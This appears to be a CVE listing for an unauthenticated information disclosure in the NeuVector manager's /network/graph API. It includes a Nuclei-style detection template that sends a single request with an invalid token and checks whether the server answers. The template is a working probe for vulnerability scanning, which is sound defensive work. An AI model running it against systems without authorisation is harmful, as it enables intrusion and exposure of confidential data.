CVE-2026-25703: NeuVector - Information Disclosure
2026-09-28UnknownPoC Public
Description
NeuVector through 5.4.9 contains an information disclosure vulnerability caused by missing authentication and cached sensitive data in the manager /network/graph API, letting remote attackers access sensitive information, exploit requires no special privileges.
PoC
id: CVE-2026-25703
info:
name: NeuVector - Information Disclosure
author: str4k3r
severity: high
description: |
NeuVector through 5.4.9 contains an information disclosure vulnerability caused by missing authentication and cached sensitive data in the manager /network/graph API, letting remote attackers access sensitive information, exploit requires no special privileges.
impact: |
Remote attackers can access sensitive information from the manager API, potentially exposing confidential data.
remediation: |
Update to the latest version beyond 5.4.9.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2026-25703
- https://github.com/neuvector/manager/security/advisories/GHSA-hx45-873x-74qv
- https://github.com/neuvector/manager/commit/949cc1184fdf671416f788d9d2a039f8558a717d
- https://github.com/neuvector/manager/releases/tag/v5.5.0
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
cvss-score: 7.3
cve-id: CVE-2026-25703
epss-score: 0.00804
epss-percentile: 0.5499
cwe-id: CWE-202
metadata:
verified: true
max-request: 1
vendor: suse
product: neuvector-manager
tags: cve,cve2026,neuvector,suse,manager,auth-bypass,disclosure
variables:
marker: '{{randstr}}'
http:
- raw:
- |
GET /network/graph/layout?user={{marker}} HTTP/1.1
Host: {{Hostname}}
Token: invalid
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "application/json"
- type: word
part: body
words:
- '"user":"{{marker}}"'
# digest: 4a0a0047304502201fd725546d8ab15700510e26e72d55670729a956c408a587fcb1fcd8f71efbe0022100bcc78e673e709902d90c620b2f79027cf994d713e5430715038a2f99f024676b:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.